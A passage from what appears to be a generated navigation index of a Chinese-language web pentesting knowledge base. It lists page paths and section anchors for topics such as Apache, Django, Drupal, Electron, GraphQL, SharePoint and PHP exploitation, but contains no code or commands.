es-pentesting/pentesting-finger.html#用户枚举","network-services-pentesting/pentesting-finger.html#metasploit-使用的技巧比-nmap-更多","network-services-pentesting/pentesting-finger.html#shodan","network-services-pentesting/pentesting-finger.html#命令执行","network-services-pentesting/pentesting-finger.html#finger-bounce","network-services-pentesting/pentesting-web/index.html#80443---pentesting-web-方法论","network-services-pentesting/pentesting-web/index.html#基本信息","network-services-pentesting/pentesting-web/index.html#web-api-指南","network-services-pentesting/pentesting-web/index.html#methodology-summary","network-services-pentesting/pentesting-web/index.html#server-version-vulnerable","network-services-pentesting/pentesting-web/index.html#identify","network-services-pentesting/pentesting-web/index.html#check-if-any-waf","network-services-pentesting/pentesting-web/index.html#web-tech-tricks","network-services-pentesting/pentesting-web/index.html#source-code-review","network-services-pentesting/pentesting-web/index.html#automatic-scanners","network-services-pentesting/pentesting-web/index.html#逐步-web-application-发现","network-services-pentesting/pentesting-web/index.html#初始检查","network-services-pentesting/pentesting-web/index.html#ssltls-漏洞","network-services-pentesting/pentesting-web/index.html#spidering","network-services-pentesting/pentesting-web/index.html#brute-force-directories-and-files","network-services-pentesting/pentesting-web/index.html#what-to-check-on-each-file-found","network-services-pentesting/pentesting-web/index.html#special-findings","network-services-pentesting/pentesting-web/index.html#web-vulnerabilities-checking","network-services-pentesting/pentesting-web/index.html#monitor-pages-for-changes","network-services-pentesting/pentesting-web/index.html#hacktricks-automatic-commands","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#403--401-bypasses","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#http-verbsmethods-fuzzing","n
etwork-services-pentesting/pentesting-web/403-and-401-bypasses.html#http-headers-fuzzing","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#path--fuzzing","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#parameter-manipulation","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#protocol-version","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#other-bypasses","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#brute-force","network-services-pentesting/pentesting-web/403-and-401-bypasses.html#自动化工具","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#aem-adobe-experience-manager-pentesting","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#1-fingerprinting","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#2-高价值未认证端点","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#dispatcher-绕过技巧","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#3-常见的错误配置在2025年仍然存在","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#4-最近的漏洞服务包节奏","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#5-利用片段","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#51-通过dispatcher绕过--jsp上传的rce","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#52-ssrf-到-rce历史--63","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#6-工具","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#7-加固检查清单用于报告的建议","network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.html#参考","network-services-pentesting/pentesting-web/angular.html#angular","network-services-pentesting/pentesting-web/angular.html#the-checklist","network-services-pentesting/pentesting-web/angular.html#what-is-angular","network-services-pentesting/pentesting-web/angular.html#framewo
rk-architecture","network-services-pentesting/pentesting-web/angular.html#sourcemap-配置","network-services-pentesting/pentesting-web/angular.html#数据绑定","network-services-pentesting/pentesting-web/angular.html#angular-安全模型","network-services-pentesting/pentesting-web/angular.html#漏洞","network-services-pentesting/pentesting-web/angular.html#绕过安全信任方法","network-services-pentesting/pentesting-web/angular.html#html-注入","network-services-pentesting/pentesting-web/angular.html#模板注入","network-services-pentesting/pentesting-web/angular.html#xss","network-services-pentesting/pentesting-web/angular.html#open-redirects","network-services-pentesting/pentesting-web/angular.html#参考文献","network-services-pentesting/pentesting-web/apache.html#apache","network-services-pentesting/pentesting-web/apache.html#可执行的-php-扩展","network-services-pentesting/pentesting-web/apache.html#cve-2021-41773","network-services-pentesting/pentesting-web/apache.html#lfi-通过-htaccess-errordocument-文件提供程序-ap_expr","network-services-pentesting/pentesting-web/apache.html#confusion-attack","network-services-pentesting/pentesting-web/apache.html#filename-confusion","network-services-pentesting/pentesting-web/apache.html#documentroot-混淆","network-services-pentesting/pentesting-web/apache.html#handler-confusion","network-services-pentesting/pentesting-web/apache.html#invoke-arbitrary-handlers","network-services-pentesting/pentesting-web/apache.html#参考资料","network-services-pentesting/pentesting-web/artifactory-hacking-guide.html","network-services-pentesting/pentesting-web/bolt-cms.html#bolt-cms","network-services-pentesting/pentesting-web/bolt-cms.html#rce","network-services-pentesting/pentesting-web/buckets/index.html#buckets","network-services-pentesting/pentesting-web/buckets/firebase-database.html#firebase-database","network-services-pentesting/pentesting-web/buckets/firebase-database.html#什么是-firebase","network-services-pentesting/pentesting-web/cgi.html#信息","network-services-pentesting/pentesting-web/cgi.html#s
hellshock","network-services-pentesting/pentesting-web/cgi.html#测试","network-services-pentesting/pentesting-web/cgi.html#curl-反射盲注和带外","network-services-pentesting/pentesting-web/cgi.html#利用","network-services-pentesting/pentesting-web/cgi.html#代理-mitm-到-web-服务器请求","network-services-pentesting/pentesting-web/cgi.html#旧-php--cgi--rce-cve-2012-1823-cve-2012-2311","network-services-pentesting/pentesting-web/django.html#django","network-services-pentesting/pentesting-web/django.html#cache-manipulation-to-rce","network-services-pentesting/pentesting-web/django.html#server-side-template-injection-ssti","network-services-pentesting/pentesting-web/django.html#detection","network-services-pentesting/pentesting-web/django.html#升级到-rce-的原语","network-services-pentesting/pentesting-web/django.html#另见reportlabxhtml2pdf-pdf-导出-rce","network-services-pentesting/pentesting-web/django.html#基于-pickle-的会话-cookie-rce","network-services-pentesting/pentesting-web/django.html#利用要求","network-services-pentesting/pentesting-web/django.html#概念验证","network-services-pentesting/pentesting-web/django.html#近期2023-2025pentesters-应检查的高影响-django-cve","network-services-pentesting/pentesting-web/django.html#references","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#dotnetnuke-dnn","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#dotnetnuke-dnn-1","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#版本和环境枚举","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#未经身份验证的利用","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#1-cookie-反序列化-rce--cve-2017-9822--后续","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#2-服务器端请求伪造-cve-2025-32372","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#3-ntlm-hash泄露通过unc重定向-cve-2025-52488","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#4-ip过滤绕过-cve-2025-52487","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#认证后到rce","network-services-pentesting/pen
testing-web/dotnetnuke-dnn.html#通过sql控制台","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#通过aspx-webshell上传","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#windows上的权限提升","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#加固建议蓝队","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#参考文献","network-services-pentesting/pentesting-web/drupal/index.html#drupal","network-services-pentesting/pentesting-web/drupal/index.html#发现","network-services-pentesting/pentesting-web/drupal/index.html#枚举","network-services-pentesting/pentesting-web/drupal/index.html#版本","network-services-pentesting/pentesting-web/drupal/index.html#用户名枚举","network-services-pentesting/pentesting-web/drupal/index.html#隐藏页面","network-services-pentesting/pentesting-web/drupal/index.html#已安装模块信息","network-services-pentesting/pentesting-web/drupal/index.html#自动化工具","network-services-pentesting/pentesting-web/drupal/index.html#rce","network-services-pentesting/pentesting-web/drupal/index.html#从xss到rce","network-services-pentesting/pentesting-web/drupal/index.html#利用后","network-services-pentesting/pentesting-web/drupal/index.html#读取settingsphp","network-services-pentesting/pentesting-web/drupal/index.html#从数据库中导出用户","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#drupal-rce","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#使用-php-过滤器模块","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#安装-php-filter-模块","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#后门模块","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#使用配置同步对drupal进行后门植入","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第1部分激活--media--和--media-library-","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第2部分利用功能--configuration-synchronization-","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第3部分利用功能--添加文档-","network-services-pentesting/pentesting-web/drupal/dr
upal-rce.html#第-4-部分-与-webshell-交互","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#electron-桌面应用","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#介绍","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#捕获流量","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#electron-local-code-injection","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--nodeintegration","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-preload","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#绕过点击事件","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#通过-shellopenexternal-的-rce","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-webviewtag--vulnerable-preload-ipc--shellopenexternal","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#阅读内部文件xss--contextisolation","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--旧-chromium","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#xss-phishing-via-internal-url-regex-bypass","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#file-协议","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#remote-模块","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#systempreferences-module","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#subscribenotification--subscribeworkspacenotification","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#getuserdefault--setuserdefault","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#shellshowiteminfolder","network-services-pentesting/pente
sting-web/electron-desktop-apps/index.html#content-security-policy","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-webview-csp--postmessage-trust--local-file-loading-vs-code-163","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#工具","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#实验","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#本地后门植入通过-v8-heap-snapshot-tamperingelectronchromium--cve-2025-55305","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#references","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.html#electron-contextisolation-rce-via-preload-code","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.html#示例-1","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.html#示例-2discord-应用-rce","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.html#electron-contextisolation-rce-via-electron-internal-code","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.html#示例-1","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.html#示例-2","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#electron-contextisolation-rce-via-ipc","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-0","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-1","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-2","network-servic
es-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-3","network-services-pentesting/pentesting-web/flask.html#flask","network-services-pentesting/pentesting-web/flask.html#cookies","network-services-pentesting/pentesting-web/flask.html#decoder","network-services-pentesting/pentesting-web/flask.html#flask-unsign","network-services-pentesting/pentesting-web/flask.html#ripsession","network-services-pentesting/pentesting-web/flask.html#sqli-在-flask-会话-cookie-中使用-sqlmap","network-services-pentesting/pentesting-web/flask.html#flask-代理到-ssrf","network-services-pentesting/pentesting-web/git.html#git","network-services-pentesting/pentesting-web/golang.html#connect-方法","network-services-pentesting/pentesting-web/grafana.html#grafana","network-services-pentesting/pentesting-web/grafana.html#interesting-stuff","network-services-pentesting/pentesting-web/graphql.html#graphql","network-services-pentesting/pentesting-web/graphql.html#介绍","network-services-pentesting/pentesting-web/graphql.html#graphql-和安全性","network-services-pentesting/pentesting-web/graphql.html#目录暴力攻击与-graphql","network-services-pentesting/pentesting-web/graphql.html#指纹识别","network-services-pentesting/pentesting-web/graphql.html#基本枚举","network-services-pentesting/pentesting-web/graphql.html#查询","network-services-pentesting/pentesting-web/graphql.html#搜索","network-services-pentesting/pentesting-web/graphql.html#mutations","network-services-pentesting/pentesting-web/graphql.html#directive-overloading","network-services-pentesting/pentesting-web/graphql.html#batching-brute-force-in-1-api-request","network-services-pentesting/pentesting-web/graphql.html#graphql-without-introspection","network-services-pentesting/pentesting-web/graphql.html#bypassing-graphql-introspection-defences","network-services-pentesting/pentesting-web/graphql.html#尝试-websockets","network-services-pentesting/pentesting-web/graphql.html#发现暴露的-graphql-结构","network-services-pentesting/pentesting-web/gra
phql.html#graphql中的csrf","network-services-pentesting/pentesting-web/graphql.html#graphql-中的跨站-websocket-劫持","network-services-pentesting/pentesting-web/graphql.html#graphql-中的授权","network-services-pentesting/pentesting-web/graphql.html#绕过-graphql-中的授权","network-services-pentesting/pentesting-web/graphql.html#使用-graphql-中的别名绕过速率限制","network-services-pentesting/pentesting-web/graphql.html#dos-in-graphql","network-services-pentesting/pentesting-web/graphql.html#alias-overloading","network-services-pentesting/pentesting-web/graphql.html#基于数组的查询批处理","network-services-pentesting/pentesting-web/graphql.html#指令过载漏洞","network-services-pentesting/pentesting-web/graphql.html#字段重复漏洞","network-services-pentesting/pentesting-web/graphql.html#最近的漏洞-2023-2025","network-services-pentesting/pentesting-web/graphql.html#cve-2024-47614--async-graphql-指令过载-dos-rust","network-services-pentesting/pentesting-web/graphql.html#cve-2024-40094--graphql-java-enf-深度复杂性绕过","network-services-pentesting/pentesting-web/graphql.html#cve-2023-23684--wpgraphql-ssrf-to-rce-chain","network-services-pentesting/pentesting-web/graphql.html#增量交付滥用-defer--stream","network-services-pentesting/pentesting-web/graphql.html#防御性中间件-2024","network-services-pentesting/pentesting-web/graphql.html#工具","network-services-pentesting/pentesting-web/graphql.html#漏洞扫描器","network-services-pentesting/pentesting-web/graphql.html#利用常见漏洞的脚本","network-services-pentesting/pentesting-web/graphql.html#客户端","network-services-pentesting/pentesting-web/graphql.html#自动测试","network-services-pentesting/pentesting-web/graphql.html#参考","network-services-pentesting/pentesting-web/h2-java-sql-database.html#h2---java-sql数据库","network-services-pentesting/pentesting-web/h2-java-sql-database.html#访问","network-services-pentesting/pentesting-web/h2-java-sql-database.html#rce","network-services-pentesting/pentesting-web/h2-java-sql-database.html#h2-sql注入到rce","network-services-pentesting/pentesting-web/iis-internet-information-services.html#iis---int
ernet-information-services","network-services-pentesting/pentesting-web/iis-internet-information-services.html#内部ip地址泄露","network-services-pentesting/pentesting-web/iis-internet-information-services.html#执行-config-文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#iis-发现暴力破解","network-services-pentesting/pentesting-web/iis-internet-information-services.html#路径遍历","network-services-pentesting/pentesting-web/iis-internet-information-services.html#泄露源代码","network-services-pentesting/pentesting-web/iis-internet-information-services.html#探索二进制文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#根目录文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#命名空间和-webconfig","network-services-pentesting/pentesting-web/iis-internet-information-services.html#下载-dlls","network-services-pentesting/pentesting-web/iis-internet-information-services.html#常见文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#httpapi-20-404-错误","network-services-pentesting/pentesting-web/iis-internet-information-services.html#值得关注的旧-iis-漏洞","network-services-pentesting/pentesting-web/iis-internet-information-services.html#microsoft-iis-波浪字符漏洞特性--短文件文件夹名称泄露","network-services-pentesting/pentesting-web/iis-internet-information-services.html#基本身份验证绕过","network-services-pentesting/pentesting-web/iis-internet-information-services.html#aspnet-traceaxd-启用调试","network-services-pentesting/pentesting-web/iis-internet-information-services.html#aspxauth-cookie","network-services-pentesting/pentesting-web/iis-internet-information-services.html#iis-身份验证绕过与缓存密码-cve-2022-30209","network-services-pentesting/pentesting-web/imagemagick-security.html#imagemagick-安全","network-services-pentesting/pentesting-web/imagemagick-security.html#朝着更安全的政策","network-services-pentesting/pentesting-web/imagemagick-security.html#允许列表与拒绝列表方法","network-services-pentesting/pentesting-web/imagemagick-security
.html#策略中的大小写敏感性","network-services-pentesting/pentesting-web/imagemagick-security.html#资源限制","network-services-pentesting/pentesting-web/imagemagick-security.html#策略碎片化","network-services-pentesting/pentesting-web/imagemagick-security.html#a-starter-restrictive-policy","network-services-pentesting/pentesting-web/imagemagick-security.html#references","network-services-pentesting/pentesting-web/ispconfig.html#ispconfig","network-services-pentesting/pentesting-web/ispconfig.html#概述","network-services-pentesting/pentesting-web/ispconfig.html#语言编辑器-php-代码注入-cve-2023-46818","network-services-pentesting/pentesting-web/ispconfig.html#手动利用流程","network-services-pentesting/pentesting-web/ispconfig.html#python-poc","network-services-pentesting/pentesting-web/ispconfig.html#硬化","network-services-pentesting/pentesting-web/ispconfig.html#参考资料","network-services-pentesting/pentesting-web/jboss.html#jboss","network-services-pentesting/pentesting-web/jboss.html#枚举和利用技术","network-services-pentesting/pentesting-web/jboss.html#利用资源","network-services-pentesting/pentesting-web/jboss.html#寻找易受攻击的目标","network-services-pentesting/pentesting-web/jira.html#jira--confluence","network-services-pentesting/pentesting-web/jira.html#检查权限","network-services-pentesting/pentesting-web/jira.html#自动化枚举","network-services-pentesting/pentesting-web/jira.html#atlasian-插件","network-services-pentesting/pentesting-web/jira.html#后门插件","network-services-pentesting/pentesting-web/joomla.html#joomla","network-services-pentesting/pentesting-web/joomla.html#joomla-统计","network-services-pentesting/pentesting-web/joomla.html#enumeration","network-services-pentesting/pentesting-web/joomla.html#discoveryfootprinting","network-services-pentesting/pentesting-web/joomla.html#版本","network-services-pentesting/pentesting-web/joomla.html#自动","network-services-pentesting/pentesting-web/joomla.html#api-未经身份验证的信息泄露","network-services-pentesting/pentesting-web/joomla.html#暴力破解","network-services-pentesting/pentesting-web/joomla.
html#rce","network-services-pentesting/pentesting-web/joomla.html#从-xss-到-rce","network-services-pentesting/pentesting-web/jsp.html#jsp","network-services-pentesting/pentesting-web/jsp.html#getcontextpath--滥用","network-services-pentesting/pentesting-web/laravel.html#laravel","network-services-pentesting/pentesting-web/laravel.html#laravel-sqlinjection","network-services-pentesting/pentesting-web/laravel.html#app_key--encryption-internals-laravel-u003e56","network-services-pentesting/pentesting-web/laravel.html#laravel-crypto-killer-","network-services-pentesting/pentesting-web/laravel.html#真实世界的易受攻击模式","network-services-pentesting/pentesting-web/laravel.html#通过-cookie-brute-force-发现大量-app_key","network-services-pentesting/pentesting-web/laravel.html#cve-2024-52301--http-argvenv-覆盖--auth-bypass","network-services-pentesting/pentesting-web/laravel.html#laravel-技巧","network-services-pentesting/pentesting-web/laravel.html#调试模式","network-services-pentesting/pentesting-web/laravel.html#指纹识别--暴露的开发端点","network-services-pentesting/pentesting-web/laravel.html#env","network-services-pentesting/pentesting-web/laravel.html#decrypt-cookie","network-services-pentesting/pentesting-web/laravel.html#laravel-deserialization-rce","network-services-pentesting/pentesting-web/laravel.html#cve-2021-3129","network-services-pentesting/pentesting-web/laravel.html#references","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#microsoft-sharepoint--pentesting--exploitation","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#1-quick-enumeration","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#2-2025-exploit-chain-aka-toolshell","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#21-cve-2025-49704--code-injection-on-toolpaneaspx","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#22-cve-2025-49706--improper-authentication-bypass","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#2
3-cve-2025-53770--unauthenticated-viewstate-deserialization--rce","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#24-cve-2025-53771--路径遍历--webconfig-泄露","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#3-在野外观察到的后渗透食谱","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#31-提取每个--config--文件变体-1","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#32-部署一个-base64-编码的-aspx-web-shell变体-2","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#33-混淆变体变体-3","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#34-ak47c2-多协议后门和-x2anylock-勒索软件观察到-2025-2026","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#4-检测思路","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#5-加固与缓解","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#相关技巧","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#参考文献","network-services-pentesting/pentesting-web/moodle.html#moodle","network-services-pentesting/pentesting-web/moodle.html#自动扫描","network-services-pentesting/pentesting-web/moodle.html#droopescan","network-services-pentesting/pentesting-web/moodle.html#moodlescan","network-services-pentesting/pentesting-web/moodle.html#cmsmap","network-services-pentesting/pentesting-web/moodle.html#cves","network-services-pentesting/pentesting-web/moodle.html#rce","network-services-pentesting/pentesting-web/moodle.html#post","network-services-pentesting/pentesting-web/moodle.html#查找数据库凭据","network-services-pentesting/pentesting-web/moodle.html#从数据库中转储凭据","network-services-pentesting/pentesting-web/nextjs.html#nextjs","network-services-pentesting/pentesting-web/nextjs.html#nextjs-应用程序的一般架构","network-services-pentesting/pentesting-web/nextjs.html#典型文件结构","network-services-pentesting/pentesting-web/nextjs.html#核心目录和文件","network-services-pentesting/pentesting-web/nextjs.html#nextjs-中的客户端","network-services-pentesting/pentesting-web/nex
tjs.html#app-目录中的基于文件的路由","network-services-pentesting/pentesting-web/nextjs.html#潜在的客户端漏洞","network-services-pentesting/pentesting-web/nextjs.html#nextjs-中的服务器端","network-services-pentesting/pentesting-web/nextjs.html#服务器端渲染-ssr","network-services-pentesting/pentesting-web/nextjs.html#静态网站生成-ssg","network-services-pentesting/pentesting-web/nextjs.html#serverless-functions-api-routes","network-services-pentesting/pentesting-web/nextjs.html#pages-目录中的-api-路由nextjs-12-及更早版本","network-services-pentesting/pentesting-web/nextjs.html#cors配置","network-services-pentesting/pentesting-web/nextjs.html#客户端的服务器代码暴露","network-services-pentesting/pentesting-web/nextjs.html#关键文件及其角色","network-services-pentesting/pentesting-web/nextjs.html#middlewarets--middlewarejs","network-services-pentesting/pentesting-web/nextjs.html#nextconfigjs","network-services-pentesting/pentesting-web/nextjs.html#pages_appjs-和-pages_documentjs","network-services-pentesting/pentesting-web/nextjs.html#自定义服务器可选","network-services-pentesting/pentesting-web/nextjs.html#额外的架构和安全考虑","network-services-pentesting/pentesting-web/nextjs.html#环境变量和配置","network-services-pentesting/pentesting-web/nextjs.html#身份验证和授权","network-services-pentesting/pentesting-web/nextjs.html#性能优化","network-services-pentesting/pentesting-web/nginx.html#nginx","network-services-pentesting/pentesting-web/nginx.html#missing-root-location","network-services-pentesting/pentesting-web/nginx.html#alias-lfi-misconfiguration","network-services-pentesting/pentesting-web/nginx.html#不安全的路径限制","network-services-pentesting/pentesting-web/nginx.html#不安全的变量使用--http-请求分割","network-services-pentesting/pentesting-web/nginx.html#any-variable","network-services-pentesting/pentesting-web/nginx.html#使用-try_files-和-uriargs-变量","network-services-pentesting/pentesting-web/nginx.html#原始后端响应读取","network-services-pentesting/pentesting-web/nginx.html#merge_slashes-设置为-off","network-services-pentesting/pentesting-web/nginx.html#maclicious-响应头","network-services-pentesti
ng/pentesting-web/nginx.html#map-指令中的默认值","network-services-pentesting/pentesting-web/nginx.html#dns-欺骗漏洞","network-services-pentesting/pentesting-web/nginx.html#proxy_pass-和-internal-指令","network-services-pentesting/pentesting-web/nginx.html#proxy_set_header-upgrade--connection","network-services-pentesting/pentesting-web/nginx.html#尝试一下","network-services-pentesting/pentesting-web/nginx.html#静态分析工具","network-services-pentesting/pentesting-web/nginx.html#gixy","network-services-pentesting/pentesting-web/nginx.html#nginxpwner","network-services-pentesting/pentesting-web/nginx.html#参考文献","network-services-pentesting/pentesting-web/nodejs-express.html#nodejs-express","network-services-pentesting/pentesting-web/nodejs-express.html#cookie-signature","network-services-pentesting/pentesting-web/nodejs-express.html#single-cookie-with-a-specific-name","network-services-pentesting/pentesting-web/nodejs-express.html#自定义字典","network-services-pentesting/pentesting-web/nodejs-express.html#使用批处理模式测试多个-cookie","network-services-pentesting/pentesting-web/nodejs-express.html#使用自定义字典在批处理模式下测试多个-cookie","network-services-pentesting/pentesting-web/nodejs-express.html#编码并签署新-cookie","network-services-pentesting/pentesting-web/sitecore/index.html#sitecore-experience-platform-xp--preauth-html-cache-poisoning-to-postauth-rce","network-services-pentesting/pentesting-web/sitecore/index.html#preauth-primitive-xaml-ajax-reflection--htmlcache-write","network-services-pentesting/pentesting-web/sitecore/index.html#poc-请求-cve-2025-53693","network-services-pentesting/pentesting-web/sitecore/index.html#what-to-poison-缓存键构造","network-services-pentesting/pentesting-web/sitecore/index.html#枚举可缓存项和-vary-by-维度","network-services-pentesting/pentesting-web/sitecore/index.html#sidechannel-enumeration-under-restricted-identities-cve-2025-53694","network-services-pentesting/pentesting-web/sitecore/index.html#postauth-rce-binaryformatter-sink-位于-converttoruntimehtml-cve-2025-53691","network-services-pentesting
/pentesting-web/sitecore/index.html#完整利用链","network-services-pentesting/pentesting-web/sitecore/index.html#检测","network-services-pentesting/pentesting-web/sitecore/index.html#加固","network-services-pentesting/pentesting-web/sitecore/index.html#references","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-tricks","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#cookies-common-location","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#绕过-php-比较","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#松散比较类型转换---","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#in_array","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#strcmpstrcasecmp","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#严格类型转换","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#preg_match","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php混淆的类型转换","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#execute-after-redirect-ear","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#路径遍历和文件包含漏洞利用","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#更多技巧","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#password_hashpassword_verify","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#http-headers-bypass-abusing-php-errors","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-函数中的-ssrf","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#代码执行","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过---preg_replace---进行-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过eval进行rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过-assert-实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过-usort-进行-rce","network
-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过-httaccess-实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过环境变量实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xampp-cgi-rce---cve-2024-4577","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-sanitization-bypass--brain-fuck","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-静态分析","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#反混淆-php-代码","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-包装器和协议","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xdebug-未经身份验证的-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#变量变量","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#rce-利用新的-_geta_getb","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#无字母执行-php","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#使用八进制","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#异或","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xor-简易-shell-代码","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xor-shellcode-inside-eval","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#类似-perl","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php---有用的函数与-disable_functionsopen_basedir-绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php-命令与代码执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php-命令执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php-代码执行","network-services-pentesting/pent
